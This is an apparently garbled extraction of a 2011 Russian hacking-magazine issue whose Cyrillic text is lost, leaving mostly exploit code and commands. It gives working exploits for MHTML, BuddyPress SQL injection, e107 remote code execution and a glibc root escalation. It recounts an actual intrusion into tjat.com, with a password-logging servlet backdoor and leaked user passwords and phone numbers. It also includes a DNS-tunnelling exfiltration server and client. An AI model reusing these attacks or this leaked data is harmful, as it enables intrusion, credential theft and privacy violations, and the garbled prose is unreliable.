Qwerty;
abc123;
password;
_;
_.
).
Fast Track e /- Metasploit.
, , e
e BackTrack R2. , .
:
e , win-
( nix ) , ,
. , . ,
: .

debug.exe. Debug - Windows,
.
- .
exe- hex (
). ,
. debug, exe.
,
Fast Track - (
1. Fast Track.
2. "Binary to Hex Payload Converter".
3. exe-,
.
echo,
. , .
, , .
Citrix ( RDP). , e ,
: ,
64 . . netcat
(, 60 ) -
- Metasploit, meterpreter .
, . ?
exe- debug-
040
X 04 /147/ 2011
.
MSSQL-,
xp_cmdshell (
).
MSSQL. DefCon
16 2008 Securestate (defcon.org/images/defcon-16/
dc16-presentations/defcon-16-panel-black_vs_white.pdf).
, e
(https://media.defcon.org/dc-16/tools/sa_exploiter.rar).
exe-,
debug.exe,
.
, debug.
, ,
(, ).
e . Metasploit ,
MSSQL,
( c DefCon). ( MSF )
offensive-security.com/metasploit-unleashed/The_Guts_Behind_It.
BackTrack 4 - /opt/metasploit3/
msf3/data/exploits/mssql. (h2b) hex-
debug. , e ,
, (, converter.tmp):
e exe-:
debug < converter.tmp
:
move converter.bin converter.exe
exe-.
.
hex-. hex- exe.
, :
converter.exe evil_file_hex.txt

Windows debug.exe.
( Win7 ).
:
,
JAVASCRIPT.
:
,
. .
e, .
, .
: flash, pdf reader, java. . , / ,
,
.
, .
100%, http-
User-Agent. , JavaScript.
,
, , -, , , , IE ActiveX-,
.
, . -,
, , e (enabled).
- ? , -.
pinlady.net/PluginDetect, .
Java, QuickTime, Flash, Shockwave,
Silverlight, PDF- e
. , , .
.

. javascript- plugindetect.js.
6
X 04 /147/ 2011
?
:
<script type="text/javascript" src="plugindetect.js">
</script>
Adobe Reader, :
var reader_version = PluginDetect.getVersion("AdobeReader");
,
.
.
e ,
.
: ][ !
:
e group.xakep.ru. - .
, , .
- .
041

(icq 884888, snipper.ru)
, ! ][.
.
,
.
01

MICROSOFT WINDOWS MHTML
BRIEF

, .
MHTML (MIME Encapsulation of
Aggregate HTML) IE. -
MHTML MIME-
.
,
. , - .
EXPLOIT

80vul.com.
1. XSS mhtml-.
MHTML,
Content-Type . , mhtml-
XSS- - *.jpg.
(, ) html-
( )
:
<iframe src="MHTML:http://target-site.com/upfile/
demo.html!cookie"></iframe>

.
.
, ,
-
042
.
: copy /b 1.jpg + 1.mhtml 2.jpg.
2. CRLF/XSS- MHTML-.
MHTML CRLF ( ).
, CRLF ( , ),
.
iframe-, advisory.
MHTML-
JSON, XSS
Content-Type .
3. X-FRAME-OPTIONS.
, .
, - html-
response-, X-Frame-Options,
.
X-Frame-Options DENY, IE , .
SAMEORIGIN, IE ,

,
X-Frame-Options.

ClickJacking-.

MHTML:
<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie">
</iframe>
<iframe src="http://www.80vul.com/mhtml/zz.php">
</iframe>
4. XSS- MHTML + file://uncpath +

Adobe Reader 9.
2010 BK
X 04 /147/ 2011
X-Frame-Options
calc.exe MHTML
(http://goo.gl/kmBXB).
Script src to local files in
the LocalLow directory file://,
JS- Adobe Reader.
MHTML,
. , http://goo.
gl/pCY3P ( win2k3+ie8+Adobe Reader 9).
5. XSS- MHTML + file:///uncpath + MS
Word.
: 80vul.com/mhtml/
word.doc. , c:\word.doc, c:\boot.ini.
Microsoft Word javascript execution
(http://goo.gl/9OKNw). PoC,
word.doc, .
a. html- XSS:
MHTML.
, firebug9 (http://goo.gl/
ERFoS):
<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-11111111
1111 CODEBASE=c:/winnt/system32/calc.exe></OBJECT>

ie6/ie7/ie8 + win2k/winxp/win2k3.
MHTML , , xss- mhtml :
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b760080c744f389><param name=url value=mhtml:file://c:/
word.doc!cookie></OBJECT>
aaaaa
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b760080c744f389><param name=url value=http://www.80vul.

com/hackgame/word.htm></OBJECT>
aaaaa
b. MS Word c:\word.xml.
c. c:\word.xml
mhtml- <w:t>aaaaa</w:t>:
/*
Content-Type: multipart/related; boundary="_boundary_by_
mere":
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb2
0vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere-*/
d. c:\word.xml c:\word.doc.
e. c:\word.doc .
, word.
6. Cross Zone Scripting
X 04 /147/ 2011
/*
Content-Type: multipart/related; boundary="_boundary_
by_mere":
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS
0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5
c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere-*/
calc.exe.
advisory
http://goo.gl/aZ9Ay.
TARGETS
Microsoft Windows XP/2003/Vista/2008/7
SOLUTION

mhtml-.
:
1. Fix it,
support.microsoft.com/kb/2501696.
043
SQL- BuddyPress
2.
Windows ( : securitylab.ru/vulnerability/404604.php).
02
BUDDYPRESS >=1.2 ACTIVITY GET_

SPECIFIC() SQL INJECTION EXPLOIT
BRIEF
BuddyPress
WordPress,
.
, Google 716 000
BuddyPress inurl:members/admin/activity. SQL-
, (
BuddyPress 1.2.7).
, php-.
1. ./wp-content/plugins/buddypress/
bp-themes/bp-default/groups/single/home.php:
<?php elseif ( bp_group_is_visible() &&
bp_is_active( 'activity' ) ) : ?>
<?php locate_template(
array( 'groups/single/activity.php' ), true ) ?>
2. activity ./wp-content/
plugins/buddypress/bp-themes/bp-default/groups/single/activity.php:
<div class="activity single-group">
<?php locate_template(
array( 'activity/activity-loop.php' ), true ) ?>
</div><!-.activity -->
044
BuddyPress
3. ./wp-content/plugins/buddypress/bp-themes/
bp-default/activity/activity-loop.php : <?php if (
bp_has_activities( bp_ajax_querystring( 'activity' ) ) ) : ?>;
4. ./wp-content/plugins/buddypress/
bp-activity/bp-activity-templatetags.php:
function bp_has_activities( $args = '' ) {
....
$r = wp_parse_args( $args, $defaults );
extract( $r );
....
case 'favorites':
$favs = bp_activity_get_user_favorites( $user_id );
if ( empty( $favs ) )
return false;
$include = implode( ',', (array)$favs );
break;
$activities_template = new BP_Activity_Template ( $page,
X 04 /147/ 2011

$per_page, $max, $include, $sort, $filter,
$search_terms, $display_comments, $show_hidden );
...
5. ./wp-content/plugins/buddypress/bp-activity/
bp-activity-templatetags.php bp_activity_template():
function bp_activity_template( $page, $per_page,
$max, $include, $sort, $filter, $search_terms,
$display_comments, $show_hidden )
{
...
/* Get an array of the logged in users favorite activities */
$this->my_favs = maybe_unserialize(
get_usermeta( $bp->loggedin_user->id,
'bp_favorite_activities' ) );
if ( !empty( $include ) ) {
/* Fetch specific activity items based on IDs */
$this->activities = bp_activity_get_specific( array(
'activity_ids' => explode( ',', $include ),
'max' => $max,
'page' => $this->pag_page,
'per_page' => $this->pag_num,
'sort' => $sort,
'display_comments' => $display_comments ) );
...
}
6. ./wp-content/plugins/buddypress/bp-activity.
php bp_activity_get_specific():
function bp_activity_get_specific( $args = '' ) {
...
$r = wp_parse_args( $args, $defaults );
extract( $r, EXTR_SKIP );
return apply_filters( 'bp_activity_get_specific',
BP_Activity_Activity::get_specific(
$activity_ids, $max, $page, $per_page,
$sort, $display_comments ) );
}
7. , , get_specific() ./
wp-content/plugins/buddypress/bp-activity/bp-activity-classes.php:
function get_specific( $activity_ids, $max = false,
$page = 1, $per_page = 25, $sort = 'DESC',
$display_comments = false )
X 04 /147/ 2011

{
global $wpdb, $bp;
if ( is_array( $activity_ids ) )
$activity_ids = implode( ',', $activity_ids );
$activity_ids = $wpdb->escape( $activity_ids );
...
$activities = $wpdb->get_results( $wpdb->prepare (
"SELECT * FROM {$bp->activity->table_name} WHERE id IN
({$activity_ids}) ORDER BY date_recorded {$sort} $pag_sql"
));
...
}
, $activity_ids escape(),
! sql-
id IN ({$activity_ids})
, sql-injection.
EXPLOIT
:
1. .
2. .
3. sql-.
http://lamer/wp30/groups/test/activity/-9)union(sele
ct(1),(2),(3),(4),(5),concat(user_login,0x3a,user_
pass),(7),(8),(9),(10),(11),(12),(13)from(wp_users)
where(id=1)

, blind- :
http://lamer/wp30/activity/favorite/-9)or(1=(select(1)
from(wp_users)where(user_login=char(97,100,109,105,1
10)))
http://goo.
gl/pdk8r.
TARGETS
BuddyPress >=1.2 <= 1.2.7
045
e107
SOLUTION
./wp-content/plugins/
buddypress/bp-activity/bp-activity-classes.php :
$activity_ids = implode( ',', $activity_ids );
$activity_ids = $wpdb->escape( $activity_ids );
:
$activity_ids = $wpdb->escape($activity_ids);
$activity_ids = implode( "','", $activity_ids);
id IN ({$activity_ids}) id IN ('{$activity_ids}').
03

OPERA
BRIEF
.
, .
1.
html- select
( PoC DoS ).
046
2. opera:.

.
3. , http . web-
.
4. ,
,
- (
).
5. , Clear all email account
passwords Delete Private Data, email .
.
EXPLOIT
2-4
, .
- DoS- ( , , ).
PoC PHP:
<select name="dos">
<?for($i=0;$i<32768;$i++):?>
<option><?=$i?></option>
<?endfor;?>
</select>
X 04 /147/ 2011
. PoC Perl
:
i=0
buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA</option>\n"
while i<0x4141
buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA</option>\n"
i+=1
end
HTML =
"<html>\n"+
"<body>\n\n"+
"<select>\n\n"
HTML+=buf * 100
HTML += "\n\n\n\</select>\n\n"+
"</body>\n\n\n"+
"</html>\n\n\n\n\n"
f = File.open("Exploit_opera_11.00.html","w")
f.puts HTML
f.close
Opera html-.
TARGETS
Opera 10.63, 11.0 .
SOLUTION

opera.com.
E107 <= 0.7.24 REMOTE PHP CODE

EXECUTION
BRIEF
-
PHP e107 (http://goo.
gl/LWE19). 0x6a616d6573 ./class2.php:
revision 1.388, Sat Jan 9 20:32:21 2010 UTC
define("e_QUERY", $e_QUERY);
revision 1.390, Fri Jan 22 15:00:22 2010 UTC
define("e_QUERY", str_replace(array('{', '}',
'%7B', '%7b', '%7D', '%7d'), '', $e_QUERY));
, . login.php:
$text = preg_replace("/\{(.*?)\}/e", 'varset($\1,"\1")',
$LOGIN_TABLE);
preg_replace() e
URL http://www.example.com/e107/login.pHp/
{x,phpinfo()}. ,
,
e107 0.7.24:
X 04 /147/ 2011
1. ./search.php 400 :
$text = preg_replace("/\{(.*?)\}/e", '$\1',
$SEARCH_TOP_TABLE);
2. $SEARCH_TOP_TABLE
./e107_themes/templates/search_template.php:
if (!isset($SEARCH_TOP_TABLE)) {
$SEARCH_TOP_TABLE =
"<div style='text-align:center'>
<form id='searchform' name='searchform' method='get'
action='".e_SELF."'>
<table style='".USER_WIDTH."' class='fborder'><tr>
<td class='forumheader3' style='width: 40%'>".LAN_199."
</td>
<td class='forumheader3'
style='width: 60%; white-space: nowrap'>
{SEARCH_MAIN_SEARCHFIELD}
{SEARCH_MAIN_SUBMIT} {ENHANCED_ICON}
</td>
</tr>";
}
e_SELF $_SERVER[PHP_
SELF], ./class2.php:
if(($pos = strpos($_SERVER['PHP_SELF'], ".php/")) !== false)
// redirect bad URLs to the correct one.
{
$new_url = substr($_SERVER['PHP_SELF'], 0, $pos+4);
$new_loc = ($_SERVER['QUERY_STRING']) ?
$new_url."?".$_SERVER['QUERY_STRING'] : $new_url;
header("Location: ".$new_loc);
exit();
}
$_SERVER['PHP_SELF'] = (
($pos = strpos($_SERVER['PHP_SELF'], ".php")) !== false
? substr($_SERVER['PHP_SELF'], 0, $pos+4)
: $_SERVER['PHP_SELF']);
EXPLOIT
0x6a616d6573 , , ,
( ): http://lamer/e107-0.7.24/search.pHp/
{a=eval(phpinfo())}.
TARGETS
e107 <= 0.7.24
SOLUTION

./class2.php :
:
define("e_SELF ", ($pref['ssl_enabled'] == '1' ?
"https://".$_SERVER['HTTP_HOST'] :
"http://".$_SERVER['HTTP_HOST']) .
($_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] :
$_SERVER['SCRIPT_FILENAME']));
:
$_SERVER['PHP_SELF'] = str_replace(array('{', '}',
'%7B', '%7b', '%7D', '%7d'), '', $_SERVER['PHP_SELF']));
047

& M4g (icq 884888, snipper.ru)
TJAT.OM:

ICQ-
, tjat.com,
ICQ/GTalk/Facebook//... . .
,
WAP-.
-
tjat.com. ,
forums.tjat.
com/phpBB2/language/lang_ukrainian/1.php!
, .
-, :
System: Linux tjat-srv-main 2.6.15-1.2054_FC5smp #1 SMP
Tue Mar 14 16:05:46 EST 2006 i686
048
-, -, raptor_
prctl1, Linux Kernel 2.6.13 <=
2.6.17.4 prctl() Local Root Exploit.
-, , - ICQ-, - /usr/local/
apache_1.3.37/logs/. ,
.
,
Reverse IP Lookup,
yougetsignal.com/tools/web-sites-on-web-server, ,
forums.tjat.com :
X 04 /147/ 2011
WARNING
warning

.

.
,

,

.
forums.tjat.com
forums.tjat.com;
temp.tjat.com;
tjat.com ( miami.tjat.com);
www.tjat.com.
, , ,
tjat.com :).
, java , , Apache Tomcat.

/usr/local/
tomcat/conf/Catalina/localhost/wapicq.xml,
PostgreSQL :
...
<Valve
className="org.apache.catalina.valves.
AccessLogValve"
prefix="wapicq_access_log."
suffix=".txt"
pattern="combined"
condition="p"/>
<Resource name="jdbc/wapicq"
type="javax.sql.DataSource"
auth="Container"
factory="org.apache.tomcat.dbcp.dbcp.
BasicDataSourceFactory"
url="jdbc:postgresql://10.0.0.1:5432/wapicq"
driverClassName="org.postgresql.Driver"
username="postgres"
password="postgres"
...

:
/usr/local/hyperic/server-4.2.0/hqdb/bin/
psql -h 10.0.0.1 -l -U postgres -W
(,
, postgres !):
List of databases
Name | Owner
| Encoding
------------------------------------------art
| postgres
| LATIN1
cabs
| postgres
| UTF8
chikka
| postgres
| SQL_ASCII
facebook
| postgres
| UTF8
msn
| postgres
| SQL_ASCII
X 04 /147/ 2011

myid
postgres
space
statistics
summary
template0
template1
tjat
twitter
ucl
wapaol
wapfb
wapicq
wapqq
xmpp
yahoo
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
postgres
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
UTF8
LATIN1
SQL_ASCII
SQL_ASCII
SQL_ASCII
LATIN1
LATIN1
SQL_ASCII
UTF8
UTF8
SQL_ASCII
UTF8
SQL_ASCII
SQL_ASCII
UTF8
SQL_ASCII

:
1. wapicq.icquser,
141 (
):
...
555628075 2010-11-07 20:05:39 12.150.188.194
SonyEricssonK610i
333786737 2011-01-29 16:57:25 212.150.188.194
SonyEricssonW595/R3EJ
390588423 2010-12-10 05:08:38 213.87.76.177
Mozilla/5.0 (Linux; U; Android 2.1-update1;
tr-tr; HTC_Wildfire_A3333 Build/ERE27)
429828391 2010-09-05 20:34:00 213.87.86.70
Opera/9.80
...
HTTP://WWW
www
Linux Kernel 2.6.13
<= 2.6.17.4 prctl() Local
Root Exploit: exploitdb.com/exploits/2031;
Glibc advisory: opennet.ru/opennews/art.
shtml?num=28338;
3
Glibc: https://rdot.org/
forum/showthread.
php?t=817;

Java: javadb.
com/write-to-fileusing-bufferedwriter.
2. statistics.traffic,
(- ,
_GET,
);
3. myid.user_accounts myid.users,
:
448280389;junam30
467470765;yulian2007
tjattest10@hotmail.com;tjattest1
049
dima
ytest7654;123456
008138969;yulian7654
tjatqa1;qa1234
...
pg_dump,
PHP, ,
PostgreSQL:
/usr/local/hyperic/server-4.2.0/hqdb/bin/pg_dump
-h 10.0.0.1 -U postgres -i -W -t icquser -v -f /usr/
local/apache_1.3.37/htdocs/forum/phpBB2/language/
lang_ukrainian/1.sql statistics
icquser
statistics /usr/local/apache_1.3.37/htdocs/forum/phpBB2/
language/lang_ukrainian/1.sql
4. postgres-
tjat: 192.168.25.2, 192.168.25.22, 192.168.25.23,
192.168.25.24, 192.168.25.25, 192.168.25.26
nmap-,
.
postgres-,

wap.tjat.com.

PostgreSQL .
, :
1. :
/usr/local/hyperic/server-4.2.0/hqdb/bin/psql -h \
10.0.0.1 -U postgres -d statistics
2. :
set client_encoding to UTF8;
CREATE TABLE aaaaa(b text);
copy aaaaa from '/etc/passwd';
select * from aaaaa;
DROP TABLE aaaaa;

/etc/passwd 10.0.0.1:
...
haim:x:504:507::/home/haim:/bin/tcsh
Tjat_qa_Automation:x:505:508::/home/Tjat_
050
Tomcat
qa_Automation:/bin/bash
TjToFc:x:0:0::/home/TjToFc:/bin/tcsh
vlad:x:506:510::/home/vlad:/bin/tcsh
yulian:x:507:511::/home/yulian:/bin/tcsh
yaron:x:508:512::/home/yaron:/bin/tcsh
yuriy:x:509:513::/home/yuriy:/bin/tcsh
JonathaN:x:510:514::/home/JonathaN:/bin/tcsh
OrenC:x:511:515::/home/OrenC:/bin/tcsh
, , postgres- tjat,
-, /etc/passwd, . ,
copy aaaaa from '/etc/hosts'; :
ERROR: extra data after last expected column
CONTEXT: COPY aaaaa, line 3: "#127.0.0.1 tjat-operdb tjat-stat-db localhost.localdomain localhost
serverDB_il.tjat.com"
, ,
( ),
:).
,
!
, tjat,
X 04 /147/ 2011
ssh
nmap
. , ... , tjat.com
, - : ShadOS
- 103- (xakep.ru/magazine/
xa/103/076/1.asp), ssh.
:
1. tjatcompassword.
2. / .
3. .
, ssh forums.tjat.com

4430, nmap:
Host 192.168.25.8 appears to be up ... good.
Interesting ports on 192.168.25.8:
(The 65530 ports scanned but not shown below are in state:
closed)
PORT STATE SERVICE VERSION
80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
81/tcp open http Apache httpd 1.3.41 ((Unix))
111/tcp open rpcbind 2 (rpc #100000)
4430/tcp open ssh OpenSSH 4.3 (protocol 2.0)
8009/tcp open ajp13?
, , :
Host mail.tjat.com (82.80.244.153) is up (0.22s latency).
Interesting ports on mail.tjat.com (82.80.244.153):
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 1.3.37 ((Unix) PHP/4.4.6)
4430/tcp open ssh OpenSSH 4.3 (protocol 2.0)
, ssh , .
last -50 ,
dima .
, -
, , .
MySQL: /etc/init.d/mysql stop.
dima;dima76767676,
:).
X 04 /147/ 2011

.
ssh -p 4430
dima@192.168.25.2 ,
tjat!
, nmap , 192.168.25.5,
192.168.25.6, 192.168.25.7 192.168.25.8 :
1. .
2. /usr/local/tomcat/logs/iq
wap.icq.com ( forums,
).
3. .
Feb
Feb
Feb
Feb
Feb
Feb
Feb
Feb
...
17
17
12
14
15
16
17
17
00:11
00:22
23:59
00:00
00:00
00:00
00:00
02:51
.
..
icq_access_log.2011-02-12.txt

( )
, exploit-db.com.
, Glibc:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ls -l /proc/$$/fd/3
lr-x------ 1 dima dima 64 Oct 15 09:21 /proc/10836/fd/3
-> /tmp/exploit/target*
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 dima dima 64 Oct 15 09:21 /proc/10836/fd/3
-> /tmp/exploit/target (deleted)
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 dima dima 4.2K Oct 15 09:22 /tmp/exploit*
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
051
LoginServlet.class
{
BufferedWriter bufferedWriter = null;
try {
bufferedWriter = new BufferedWriter
(new FileWriter(filename));
bufferedWriter.write(str);
if (bufferedWriter != null) {
bufferedWriter.flush();
bufferedWriter.close();
}
} catch (FileNotFoundException ex) {
ex.printStackTrace();
} catch (IOException ex) {
ex.printStackTrace();
}
root tjat.com
, wap.tjat.com, . java- /usr/
local/tomcat/webapps/wapicq/WEB-INF/classes/com/tjat/icq/wap/
servlet/LoginServlet.class,
:
String uin = WebServiceUtils.getRequestParameter(
request, Parameter.username.value());
if (uin == null)
httpSession.getAttribute("uin");
String password = WebServiceUtils.getRequestParameter(
request, Parameter.password.value());

,
, String password.

:
1. input/output import java.io.*;
2. LoginServlet.class
writeToFile:
public void writeToFile(string filename, string str)
052
3. String password -
:
writeToFile("/tmp/logs/logicq" + uin,
uin+";"+password+"\n");

. 6 000 , , ,
9-:
...
267962705;sfam2990
268196940;iddqd
268314965;9813694
268524966;null
268619289;rfgbnjy
2687242;0leKMyQ7
269558047;lifetec
X 04 /147/ 2011

270323224;ilevr13
270405008;univega
271169757;Minka0708
271216896;bambin
271513810;medvediki
2718070;N@DEZHD@
273801640;mahal7
273967932;aned2305
274288079;52355200
274340894;4672108
274512176;twilight
...
596351383;121314
597424414;Qw95mdfF
597439288;212008
597743487;qwerasdf123
597852239;042206tis
598396568;357159
598858992;15031993
598965238;katea60
599046657;lancer2000
599522128;nyrek90
599560833;2836846
599916355;031093
599922284;null
599950031;burenator
600223141;fuck123
600991756;123ac456
601000602;enemenezicjzack
601142649;2402%5E_%5E
602320989;FK31QC7CJc
602533494;7Mo30qLX
...
, ,
n- . -
44446:
...
Work;10776;sarel;;+972 52 4888601 SMS;
Work;11001;Vadim;;+972 52 3698945 SMS;Thu Nov 23 2006
12:32:40
Work;123178848;sasha;;+972 (547) 391010;Tue Dec 19
2006 14:51:36
Work;12721;yonitg;;+972 502340003 SMS;Mon Jun 19
2006 08:44:54
Work;12826;Orit Fredkof;;;
Work;13579;Rami;;;Thu Sep 07 2006 14:58:57
Work;14366;amit;;(972) 524888622;Sun Jul 30
2006 09:17:37
Work;14441;Ron Harari;;+972 52 4888584 SMS;Thu Sep
07 2006 15:00:06
X 04 /147/ 2011
Work;148171833;HarelEfraim;;+972 54 3054450 SMS;Thu

Sep 07 2006 15:00:22
Work;148940113;SF;;+972 (54) 4902642;Mon Jun 19
2006 08:43:46
Work;15123;Ruti;;;
Work;166967874;einat;;(972) 524888588;Mon Dec 18
2006 09:42:10
Work;16781;BoLo;;;
Work;16878;Michael Cohen;;+972 54 4527767 SMS;Mon Jun
19 2006 08:43:46
Work;18981;Ephraim;;;
Work;19791;Lior;;+972 52 4888605 SMS;Fri Jan 12
2007 12:58:39
Work;199516410;Galia;;+972 52549822 SMS;Mon Jun 19
2006 08:43:46
Work;20304;Dana;;+972 54 4954265 SMS;
Work;214509417;ouriel;;(972) 523023131;Thu Sep 07
2006 14:58:47
Work;21512;Noam ;);;(972) 4234556;Mon Jun 19
2006 08:43:45
Work;219380542;yair;;+972 52 4888596 SMS;Mon Jun 19
2006 08:42:40
Work;22221;Osnat;;+972 52 6122604 SMS;Thu Sep 07
2006 14:58:37
Work;22580;Paz;;;Mon Jun 19 2006 08:42:40
Work;23004;Channy;;;Fri Jul 14 2006 09:40:22
Work;23232;Klieger;;;Mon Jun 19 2006 08:42:40
Work;23234;Yifat;;+972 52 4888575 SMS;Sat Dec 16
2006 06:05:05
...
, WAP ICQ- tjat.com - , ,

2006-2008
.
,
/tmp forums.tjat.com
tmp_Nagios_proc.63.218.56.11.postmaster, tmp_Nagios_
proc.63.218.56.5.java .
,
miami.tjat.com,
tjat.com , wap.tjat.com,
.
, ( ) , Tjat
:).
, ,
, :
1. .
2. ssh.
3. ( !).
, , Tjat
, ICQ, MSN, Facebook ,
:). ,
,
( Tjat
), .
, , ,
tjat.com :). z
053

, Digital Security (twitter.com/asintsov)
DNS.

, : ? -, . -
... .
, , .
+ . ,
, ,
. . :
, exe- .
, ,
, . .
Digital Security exe-,

.exe
( ,
054
). pdf .
. ,
. JavaScript, , QuickTime, Acrobat Reader, Flash Player, Java, VLC Player.

( ,
). , , .
.
? reverse tcp shell , , bind tcp shell
. ,
-. reverse tcp
. .
X 04 /147/ 2011
PDF
DNS-. ,

, IP-
. ( )
,
, .
. xxxx.abcd.ru
, ,
. xxxx
. , DNS
,
.
IP-,
. ,
:).
:
-.
, /IE , COM- IE XMLHTTP
GET/POST- . ,
, :
-;
-
( );
,
.
DNS
, .
DNS. , ( , ) (
400 800 ), DNS-
. . , NS- ,
IP- ().
DNS- , SOA, A,
AAAA, CNAME NS/DNS-. . 7-8
, IP- DNS,
. ? :
, abcd.ru,
IP- porno.abcd.ru. DNS , ,
, . ,
abcd.ru , DNS-
porno.abcd.ru (A- AAAA- IPv6).
DNS- ,
, IP-,
DNS-.
. , // DNS. ,
X 04 /147/ 2011
;
DNS- ( HTTP);
.
:
;
( 1 3 );
DNS-.
, DNS . ,
, ,
, .
detected!
, , ,
. ( ) .
dnscat , DNS. , -,
, DNS- TXT (
). ,
055

:
dnscat "" UDP-
;
- 1000 ,
;

, ;
- winsock2,
(,
UAC Windows 7).
,
.
, ,
. , ,
,
, . ,
perl, , cpan
Net::DNS. ,
:).
,
.
#!/usr/bin/perl
use Net::DNS::Nameserver;
use strict;
use warnings;
$DOMAIN="abcd.ru"; #
$MYIP="123.123.123.123"; #
$SITEIP="1.2.3.4"; #
#
056
-
sub reply_handler
{
my ($qname, $qclass, $qtype, $peerhost,$query,$conn) = @_;
my ($rcode, @ans, @auth, @add);
# abcd.ru
if ($qtype eq "A" && $qname eq $DOMAIN )
{
my ($ttl, $rdata) = (3600, $SITEIP);
push @ans, Net::DNS::RR->new(
"$qname $ttl $qclass $qtype $rdata");
$rcode = "NOERROR";
...
}
elsif (($qtype eq "A")&& $qname =~ /(.*)\.$DOMAIN/)
{
$rcode = "NOERROR";
my ($ttl, $rdata) = (1, $SITEIP);
X 04 /147/ 2011
dnscat
push @ans, Net::DNS::RR->new(
"$qname $ttl $qclass $qtype $rdata");
print "Received query ($qname)($qtype) from $peerhost to"
.$conn->{"sockhost"}. "\n";
#
my $req=$1; # ~
my $len= length($req);
my $answ="";
#
for(my $i=0; $i<$len; $i+=2)
{
#
my $bh =(ord(substr($req,$i,1))-0x61) << 4;
#
my $bl = ord(substr($req,($i+1),1))-0x61;
my $bt = chr( $bh + $bl); #
$answ.= $bt;
}
#
open (LOG, ">>DATA.log");
print LOG "[$peerhost][$qname][$answ]\n";
close (LOG);
...
}
elsif( $qname eq $DOMAIN )
{
$rcode = "NOERROR";
}
else
{
$rcode = "NXDOMAIN";
}
# 100% ...
return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
, .
, JITSPRAY -, , .
HEX
, 0x61,
ASCII 'a'. , \r\n \x0A\x0D,
:
0x0A >> 4 = 0x0
0x0A&0x0F = 0xA
0x0D >> 4 = 0x0
0x0D&0x0F = 0xD
'a':
0x61 + 0x0 = 0x61 ~ 'a'
0x61 + 0xA = 0x6B ~ 'k'
0x61 + 0x0 = 0x61 ~ 'a'
0x61 + 0xD = 0x6E ~ 'n'
\r\n akan. ,
, 0x61, 4 .
,
:
#include <windows.h>
int _tmain(int argc, _TCHAR* argv[])
{
FILE *fpipe;
#
my $ns = Net::DNS::Nameserver->new(
=> 53,
LocalPort
ReplyHandler => \&reply_handler,
=> 0,
Verbose
) || die "couldn't create nameserver object\n";
# --!
//
//
//
char *command =
"cmd /c echo %username% & ipconfig & net user";
char *domain = ".abcd.ru."; //
char line[1556]; //
char subdns[150] = "nslookup ";
//
$ns->main_loop;
HWND hWnd = GetConsoleWindow();
X 04 /147/ 2011
057
Metasploit
ShowWindow( hWnd, SW_HIDE ); //
else
{
subdns[z]=
}
fpipe = (FILE*)_popen(command,"r");
//
int sz=fread(line, 1,1555, fpipe); //
//
subdns[z+1]= 0x61 + lb;
line[sz]=0;
_pclose(fpipe); //4
short i=0;
short next=1;
//
for(int y=0;y<9;y++)
{
subdns[z+y]=domain[y];
}
// 28
// 55 DNS-
do {
short c = 0;
short z = 11;
subdns[z+y]=0;
// "nslookup xxxxxxxxxxx.xxxxx.abcd.ru"
//
//
fpipe = (FILE*)_popen(subdns,"r"); //1
_pclose(fpipe); //4
subdns[9] = 0x61+(next>>4);
subdns[10] = 0x61+(next&0x0F);
for(;i<1555,c<28;i++,z+=2,c++)
{
//
if(line[i]==0x00)
{
subdns[z]=0;next=-1;break;
}
char hb=line[i]>>4;
char lb=line[i]&0x0F;
// DOS-
if(hb<0x0)
{
subdns[z]= 0x61 +(hb&0x0F);
}
058
0x61 + hb;
next++;
} while(next);
return 0;
}
JAVA- PDF.
,
, JAVA
. Adobe Acrobat Reader < 9.3.3, pdf-. PDF
Foxit/Acrobat Reader,
,
X 04 /147/ 2011
, :)
. ,
Acrobat Reader < 9.3.3 ,
.
- , ,
PDF, VBS- ( - cmd \c
echo code > script & echo code >> script),
. , , pdf-,
.
PDF , windows/fileformat/adobe_pdf_embedded_exe_nojs.
, ,

. java-
, PDF' .
,
, , -,
. , , ,
, + java.
, pdf- Avast.
, PDF.
, ,
. ,
, .
VBS- PDF, , , . CMD,
'^' ASCII-:
cmd.exe , , WScript.Shell
WSc^ri^pt.S^hell. , :
WScript.Shell WScri&pt.Sh&ell.
.
, ,
, JAVA + PDF
X 04 /147/ 2011
50%. ,
, ,
. , ,
. , DNS-
.
, , ,
,
, DLP- (, DNS?)
.
.
. , , . -,
, 0? -,
, ,
PDF , , (

Acrobat Reader'). -

( ). ,
, , , . - Windows 7 , UAC . (
). ,
, ,
( , _popen).
- EXE/VBS JAVA,
LoadLibrary, msvctl.dll. -
, - ,
. ,
DNS-payload',
, ,
dsecrg.com :). z
059

(alumni.samara@gmail.com)

Cisco
Cisco Systems
.
,
level 15,
. , Cisco IOS , ,
